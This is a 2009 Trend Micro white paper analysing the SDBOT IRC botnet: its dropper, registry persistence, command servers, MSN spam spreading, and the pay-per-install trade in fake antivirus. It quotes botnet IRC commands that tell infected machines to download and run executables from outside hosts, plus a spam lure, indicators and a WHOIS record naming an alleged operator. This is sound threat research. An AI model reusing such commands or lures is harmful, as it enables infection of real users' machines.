SDBOT IRC Botnet Continues To Make Waves

SDBOT IRC Botnet
Continues to Make Waves

Trend Micro, Incorporated

Loucif Kharouni
Trend Micro Threat Research

A Trend Micro White Paper I December 2009

SDBOT IRC Botnet Continues to Make Waves

CONTENTS
Overview ...........................................................................................................................................3
BKDR_SDBOT.COD Analysis...........................................................................................................4
Stage 1: Initial Installer ...........................................................................................................................4
TROJ_DROPPR.BH Details .............................................................................................................4
BKDR_SDBOT.COD Details ..............................................................................................................5
Stage 2: IRC Communication.................................................................................................................6
Stage 3: Third-Party Malware ............................................................................................................... 7
TROJ_CUTWAIL (PUSHDO/PANDEX) ...........................................................................................8
TROJ_FAKEAV ..................................................................................................................................8
WORM_KOOBFACE ...........................................................................................................................8
Social Engineering ...........................................................................................................................9
Spam Wave 1: Self-Promotion Spam ....................................................................................................9
Spam Wave 2: Prestige Replica Spam .................................................................................................9
Spam Wave 3: Other Social Engineering Spam ............................................................................... 10
Behind the Malware: Botnet Owners ............................................................................................ 11
SDBOT, the Pay-per-Install Model, and FAKEAV........................................................................ 15
Best Practices to Avoid SDBOT Malware Infection.................................................................... 17
Conclusion ...................................................................................................................................... 18
References ..................................................................................................................................... 20

2 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES


OVERVIEW
SDBOT malware variants usually propagate through network shares and exploited
unpatched vulnerabilities. They also exhibit a number of backdoor capabilities and some
information theft routines. Some variants even have the capability to bypass secuirty
measures and to overwrite system files in order to maximize their network connection
capacity.

Most of the bots SDBOT malware have been around as early as 2004. Most of the bots that use Internet
that use IRC proto- Relay Chat (IRC) protocol communication such as AGOBOT, IRCBOT, RBOT, and others
col communication have been around as early as 2001. However, these kinds of malware rarely attract
such as AGOBOT, attention due to their ability to silently operate. These bot malware are neither heavy email
IRCBOT, RBOT, and spammers nor resource hogs. They hardly ever disrupt normal computer activities—say,
others have been Internet browsing—so their victims never notice that their computers have been infected.
around as early as
2001 yet these kinds In this paper, the researcher focused on SDBOT variants and their final payload—the
of malware rarely installation of pay-per-install programs.
attract attention
due to their ability The contents of this paper are targeted at security analysts and specialists. It includes
to silently operate. an in-depth technical analysis of the SDBOT threat and takes a look behind the scenes
at the business model used by the cybercriminal gang to rent out SDBOT’s reach and
download capability.



BKDR_SDBOT.COD ANALYSIS
Stage 1: Initial Installer

BKDR_SDBOT.COD BKDR_SDBOT.COD is typically dropped by a Trojan detected by Trend Micro as TROJ_
is typically dropped DROPPR.BH. SDBOT.COD arrives as a file named photo.com that is actually a simple
by TROJ_DROPPR. Win32 Cabinet Self-Extractor renamed into a .COM file. If this file is renamed as an
BH as photo.com, executable file (by changing the file name extension to .EXE), the embedded file named
a simple Win32 burim.exe can then be extracted.
Cabinet Self-Extrac-
tor that has been TROJ_DROPPR.BH Details
renamed into a .COM
file.
Filename: photo.com
MD5: 613ceb085ee2ad31e1f95249d804409e
SHA-1: b73ae87c167c8ec0e9e52000d7d3d8e9ecaba27a

Here are some snippets from the Trojan’s code. The Microsoft .CAB file (MSCF) header
of the Cabinet file was found to be 4D534346 (see Figure 1).

Figure 1. MSCF header [4D534346]

To extract the contents of the Cabinet file, the strings starting at MSCF were first selected
and saved as burim.cab (see Figure 2).

Figure 2. Extracting burim.cab from photo.com



Figure 3. burim.exe extracted from burim.cab

The dropper (photo.com) performs some system changes. It then creates the following
registry entry:

HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce
rundll32.exe C:WINDOWSsystem32advpack.dll,DelNodeRunDLL32
“C:
DOCUME~1userLOCALS~1TempIXP000.TMP”

It also creates the following folder and files:

• C:DOCUME~1userLOCALS~1TempIXP000.TMP

• C:DOCUME~1userLOCALS~1TempIXP000.TMPTMP4351$.TMP

• C:DOCUME~1userLOCALS~1TempIXP000.TMPburim.exe

The dropped file burim.exe is a backdoor.

BKDR_SDBOT.COD Details

Filename: burim.exe; fxstaller.exe
MD5: 2515df8f2df211e969da5d15d995da0e
SHA-1: a4f832556e9d4e8803b74ff40d7c0fd5b1fa8609

To infect systems, BKDR_SDBOT. BKDR_SDBOT.COD places a copy of itself in the C:Windows folder as fxstaller.exe and
COD: creates the following registry entry to ensure its automatic execution at every system
• Places a copy of itself in the C:
Windows folder as fxstaller.exe
startup:
• Creates a registry entry to ensure
its automatic execution at every
system startup Windows UDP Control Center
• Connects to an IRC server whose HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
IP address may change from time fxstaller.exe
to time
• Joins an IRC channel
• Creates a mutex to ensure that Upon execution, BKDR_SDBOT.COD connects to the following IRC server:
only one instance of itself is run-
ning in memory
dddd.burimche.net -> 89.255.10.90
IP Address 89.255.10.90
Host unassigned-89-255-10-90.rdns.hosting-concepts.nl
Location NL NL, Netherlands
City Rotterdam, 11 -
Organization Netnation Europe V.O.F.
ISP Netnation Europe V.O.F.
AS Number AS15703 TrueServer BV AS number



However, the IP address (89.255.10.90) may vary. During testing, the IP address changed
every now and then to any of the following:

• 69.175.13.42

• 174.133.29.34

• 218.61.22.10

It then joins the IRC channel, ##bb##. It also creates the mutex, LiNbagGgsag, to ensure
that only one instance of itself is running in memory.

Stage 2: IRC Communication

Once back-and-forth Once back-and-forth communication has been established, the victim’s computer
communication is effectively becomes a zombie. It can now be controlled by remote users—the creators of
established after SDBOT—via IRC. As shown in the IRC screen communication in Figure 4, which is sent
SDBOT infection, a to a zombie machine, commands are sent to the victim’s computer to download third-
victim’s computer party malware. This is part of the pay-per-install business.
effectively becomes
a zombie.

Figure 4. IRC screen communication instructing victim’s computer to download files

:Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://
stashbox.org/543111/a.exe c:tpde.exe 1

The machine then downloads the file a.exe from stashbox.org and copies it to the
system’s C: drive as tpde.exe then runs it.

:Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://
www.iliridas.com/girl.exe c:tafe.exe 1



In the screenshot below (see Figure 5), the malware attempts to propagate via MSN, a
popular instant messaging (IM) application.

Figure 5. Malware attempts to propagate via MSN

A botnet master is The bot master—the remote user who currently controls the network of compromised
a remote user who machines—sends commands via IRC with the link to spam to all MSN Messenger
currently controls contacts found using the following strings:
a network of
compromised :get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg
machines. Hey, is this really you ?! : ) hxxp://www.main-gallery.com/
image.php?=[msn email add of zombie machine]

The message strings above are then sent to all of the victim’s MSN Messenger contacts.
The contact who receives the message may likely assume that the message came
from a trusted contact. If, however, he/she clicks the link in the message, he/she will be
prompted to download and execute a file (i.e., the SDBOT malware).

Stage 3: Third-Party Malware

The victim’s computer downloads any of several possible non-SDBOT malware listed
below. Note, however, that this is not an exhaustive list.

• BKDR_POISON • TROJ_SMALL

• TROJ_BUZUS • TROJ_VUNDO

• TROJ_CUTWAIL • WORM_AUTORUN

• TROJ_FAKEAV • WORM_KOOBFACE

• TROJ_RENOS • WORM_MAINBOT



Some of the malware an SDBOT- Some of the malware listed are among the more dangerous ones researchers have seen
affected system downloads are recently. The following sections provide short profiles of some of these malware whose
among the more dangerous ones
researchers have recently seen.
routines make vivid how dangerous it is to be part of an IRC botnet nowadays.
These include:
• TROJ_CUTWAIL (PUSHDO/PAN- TROJ_CUTWAIL (PUSHDO/PANDEX)
DEX/CUTWAIL)
• TROJ_FAKEAV
If a machine is infected by TROJ_CUTWAIL then it is almost always certain that it is part
• WORM_KOOBFACE
of a botnet called “CUTWAIL” (also known as “PUSHDO” or “PANDEX”). This botnet is
one of the largest spam botnets in the world. It has been responsible for several known
spam campaigns that advertise pharmaceutical products (e.g., Viagra) or pharmaceutical
companies (e.g., Canadian Pharmacy).

This botnet is also responsible for malware-related spam campaigns, specifically the
recent U.S. Independence Day spam, which contained malicious links that, when clicked,
led recipients to a website to download a WORM_WALEDAC variant. Researchers have
also seen this botnet send out ecard spam in July. These email messages bore the
same email body even though the attached file ecard.exe could either be a TROJ_
CUTWAIL or a TROJ_ZBOT variant.

TROJ_FAKEAV

Most security/tech-savvy users are already familiar with rogue antivirus (FAKEAV)
malware. These programs usually claim to rid a system of infections, which, in fact, it has
planted itself. In recent months, these FAKEAV variants arrived as the final payload of
blackhat search engine optimization (SEO) attacks. However, FAKEAV can also be part
(i.e., one of the links) of other malware infection chains.

WORM_KOOBFACE

KOOBFACE is well-known for spreading among social networking websites such as
Facebook, Friendster, Twitter, and some others. Users may receive spammed messages
in their Facebook inboxes containing links to a particular video. These links, however,
lead to the download of a KOOBFACE variant instead. KOOBFACE is one of the biggest
Web 2.0 botnets spreading on Facebook, MySpace, and Twitter.



SOCIAL ENGINEERING
Spam Wave 1: Self-Promotion Spam
SDBOT uses various social Self-promotion spam waves send malicious links to personal profile pages or files with
engineering techniques to lure
a short message in order to convince users to click the link and therefore download a
victims, the most common of
which is running spam waves malicious file, which will connect them to the botnet (see Figure 6).
featuring:
• Self-promotion spam
• Prestige replica spam
• Other social engineering spam

Figure 6. Self-promotion spam

Spam Wave 2: Prestige Replica Spam

Prestige replica spam waves send links to replica sites with a short message in order to
convince users to click the link and therefore buy replica watches (see Figure 7).

Figure 7. Prestige replica spam



Most social Spam Wave 3: Other Social Engineering Spam
engineering spam
leverage news on Most of the social engineering spam waves send malicious links to sites on which news
popular events to on popular events (e.g., Michael Jackson’s death) are hosted with a short message in
lure victims. order to convince users to click the link and therefore download a malicious file, which
will connect them to the botnet (see Figure 8).

Figure 8. Other social engineering spam



BEHIND THE MALWARE: BOTNET OWNERS
As part of this study, the researcher has been looking at everything related to the
burimche.net domain, including the following:

• *.burimilol.com

• *.burimilol.net

• *.burimche.net

• burimi.*.net

While looking for information about these domain names, the researcher came across a
forum where two members were talking about an executable file for sale. One of them
was complaining about the fact that the user burimi @ nerashti.com did not create the file
as promised after he has already paid for that service.

The manner by Continuing the investigation on domain names, the researcher also looked for the
which cybercriminals newest related domain names but found that they have all been registered in either
register domain names Yahoo! or Altavista. The manner by which the cybercriminals registered domain names
has changed to make it has changed, making it harder for researchers to track them back. So the researcher
harder for researchers decided to take a look instead at the oldest domain name—burimilol.net—and found the
to track them. following:

[BURIMILOL.NET]
BURIM ALIJI
NERASHTI 1203
TETOVO, 91200
MACEDONIA
ALBANIA

[MAINMSN.COM]
nicKy, FisniK
NERASHTI
TETOVO, 20000
source://myspc.net/wievimage.php
Registrant MYSPC.NET:
Bruno (edinplay@gmail.com)
fajro 14
Ulqin* - Laç 40000
ALGERIA

*Ulqin is located in Montenegro not in Algeria.

Burim in Albanian means “source.”

These findings suggest that these threats could originate from the Albanian, Macedonian,
or Montenegro regions.



Cybercriminals As stated earlier, it has become hard to track the cybercriminals based on domain names
continuously changed as for some reason they have resorted to using free Internet services from providers
IP addresses. Tracking such as Yahoo! or Altavista. The cybercriminals continuously changed IP addresses
a single domain name, as well, making the task even harder. For instance, tracking a single domain name can
therefore, can lead to lead to several different IP addresses. In a month, a domain name can have around four
several different IP different IP addresses (see Figure 9).
addresses.

Figure 9. IP addresses a single domain name can connect to

The botnet sends links to several domain names via MSN (see Figure 10).



Figure 10. Links sent to MSN

Given the nature of SDBOT—that it is primarily geared toward downloading other
malware files that each have their own distinct payloads and strong connections with
other malware families—it appears that the botnet is in the business of renting out its
reach and download capability to cybercriminals. These cybercriminals may either be
interested in increasing their number of victims or in sending out spammed messages
for various other purposes. This is a known malware business model wherein some
cybercriminal gangs pay others to spread their malicious code. For the longest time,
instead of conducting their own focused attacks, the SDBOT cybercriminal gang
is keeping itself busy by responding to different business requests such as installing
FAKEAV, KOOBFACE, CUTWAIL, and other malware variants on their infected bots.

Cybercriminals do As security experts and threat researchers already know by now, botnets do not only
business with other bring about big business, they are also, to a certain logical extent, interconnected to
cybercriminals to one another. Cybercriminals do business with other cybercriminals. This allows them to
take advantage of take advantage of other, possibly better, technologies and newer ways to spread their
other, possibly better, malicious code than when they do so on their own.
technologies and
newer ways to spread
their malicious code.



On top of being cybercriminals, they are first “real” criminals who conduct illegal business
by stealing money and crucial/private information and ruining companies’ businesses.
Cybercriminal interconnections are becoming more popular. Working together is no
longer a problem among cybercriminals as in the past. As such, they have become
stronger and harder to track. It is easy to see that money is driving all these illegal
activities. The only remaining question is, “Why use an ‘old’ technology such as an IRC
botnet when lots of newer technologies can already be seen in the wild?”

Using a simple The answer is quite simple—because this kind of botnet is currently off the radar unlike
but effective type several others (DOWNAD, ZEUS, WALEDAC, KOOBFACE, ILOMO, and PUSHDO),
of botnet makes which are consistently being monitored by researchers. Using a simple but effective type
cybercriminals of botnet makes cybercriminals feel like they are in “heaven.” They can opt to use not
feel like they are in only one but several ways to spread malware.
“heaven.”



SDBOT, THE PAY-PER-INSTALL MODEL, AND FAKEAV
The use of the pay- FAKEAV variants are currently taking the threat landscape by storm. The use of the pay-
per-install business per-install business model is also increasing as the model is easy to use. A botnet owner
model is increasing, now gets paid to install malware on infected PCs. For instance, a FAKEAV creator pays
making it possible the SDBOT gang, which already owns an IRC botnet and controls thousands of infected
for a botnet owner machines, to easily push the FAKEAV file to systems. The gang then gets paid a certain
to get paid to install amount of money for each successful installation (see Table 1).
malware on already-
infected systems. Country Code Price
US US$120
BR US$60
TR US$45
Mixed US$25
GB, CA, DE US$150

Table 1. Pay-per-install FAKEAV price list

The following country codes can be included in mixed lists:

• A2 • CH • GH • KR

• AE • CI • GR • KW

• AF • CL • HK • KZ

• AM • CN • HR • LK

• AR • CO • HU • LT

• AT • CZ • ID • LV

• AU • DE • IL • LY

• AZ • DZ • IN • MA

• BD • EC • IQ • MD

• BE • EG • IR • MK

• BG • ES • IT • MX

• BH • EU • JO • MY

• BR • FR • JP • NG

• BY • GB • KG • NI

• CA • GE • KH • NL



• NP • PT • SI • UA

• NZ • QA • SK • US

• OM • RO • SY • UY

• PA • RS • TH • UZ

• PE • RU • TN • VN

• PH • SA • TR • YE

• PK • SE • TW • ZA

• PL • SG • TZ

The more difficult it As shown, the prices paid depend on the target countries mainly because the difficulty
is to infect a system, of compromising systems is considered. For instance, compromising a computer located
the more money a somewhere in North America or Europe is harder to do because it is better protected,
cybercriminal gets and hence costs more. However, because more people have Internet access in these
from successfully countries, more systems can be compromised in them, which cybercriminals also take
compromising it. into consideration.

Pay-per-install services are publicly available on many Russian underground forums.
Anyone can offer pay-per-install services for money. Target systems can be chosen in
terms of:

• Region

• Country

• OS

• Language

Another way to make money in the pay-per-install business is to register in underground-
affiliated websites (see Figure 11). Cybercriminals will provide the malware sample to
interested parties who will then make it available for victims to install. Once interested
parties get the malware from an affiliate site, they bind it with a popular program and
post it via torrents or peer-to-peer (P2P) networks. Binding is a popular technique used
to merge two files together. For example, any Trojan can be merged with Adobe Acrobat
Writer, which can then be made available for download in torrents. Unknowing users will
then get a free Trojan with Adobe Acrobat Writer. Binder tools are available all over the
Web and not too hard to find.



BEST PRACTICES TO AVOID SDBOT MALWARE
INFECTION
In the course of conducting research on SDBOT variants, the researcher came across
some useful dos and don’ts that users can employ to avoid SDBOT malware infection:

• Do not click links sent via IM applications, especially if you do not know who sent
them.

• Do update your security applications regularly to decrease the chances of becoming
infected.

• Do not open unsolicited email or spam.



CONCLUSION
In this paper, we saw how this threat connects a user’s system to an IRC network. We
also saw how the botnet uses an infected system to spread other malware, which may
connect it to another botnet. We observed how cybercriminals go about their business
and how their networks are structured.

RUBotted monitors As such, we recommend the use of free tools such as RUBotted (see Figures 12 and 13)
computers for to detect if a computer is part of an IRC botnet and HouseCall (see Figure 14) to clean
suspicious activi- an infected system.
ties and regularly
checks with an online
service to identify
behaviors associated
with bots.

Figure 11. RUBotted GUI Figure 12. RUBotted message prompt

Figure 13. HouseCall GUI

HouseCall 7, Trend Micro’s latest free online scanner, leverages the Smart Protection
Network to deliver fast detection and removal of active malware. It zeroes in on active
threats by checking key system areas used by malware programs. It also checks for
malicious browser plug-ins, rootkits, and other auto-run executable files. Its new features
include:

• A browser-independent client that eliminates compatibility issues often associated
with other browser-activated scanners

• Smart Scan technology for targeted scanning of active malware, reducing scan time
to several minutes



HouseCall is Trend • In-the-cloud threat intelligence, delivering immediate detection while reducing
Micro’s highly download requirements
popular and capable
on-demand scanner • Smart feedback that shares threat information with the Smart Protection Network,
for identifying and enabling data correlation across a global intelligence network to quickly discover
removing viruses, new threats
Trojans, worms,
unwanted browser • Review and restore functionality that lets a user compare current with past scan
plug-ins, and other results and recover files
malware.



REFERENCES
• Trend Micro. (2009). Threat Encyclopedia. “BKDR_SDBOT.COD.” http://threatinfo.
trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.COD
(Retrieved August 2009).

• Trend Micro. (2009). Threat Encyclopedia. “TROJ_DROPPR.BH.” http://threatinfo.
trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPR.BH
(Retrieved August 2009).

TREND MICRO™ TREND MICRO INC.
Trend Micro Incorporated is a pioneer in secure content and threat 10101 N. De Anza Blvd.
management. Founded in 1988, Trend Micro provides individuals and Cupertino, CA 95014
organizations of all sizes with award-winning security software, hard-
US toll free: 1 +800.228.5651
ware and services. With headquarters in Tokyo and operations in
Phone: 1 +408.257.1500
more than 30 countries, Trend Micro solutions are sold through cor-
Fax: 1 +408.257.2003
porate and value-added resellers and service providers worldwide.
For additional information and evaluation copies of Trend Micro products www.trendmicro.com
and services, visit our Web site at www.trendmicro.com.

©2009 by Trend Micro, Incorporated. All rights reserved. Trend Micro, the Trend Micro t-ball logo are trademarks
20 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or
registered trademarks of their owners.

SDBOT IRC Botnet Continues To Make Waves

Recomendados

Recomendados

Mais conteúdo relacionado

Mais de Trend Micro

Mais de Trend Micro (20)

Último

Último (20)

SDBOT IRC Botnet Continues To Make Waves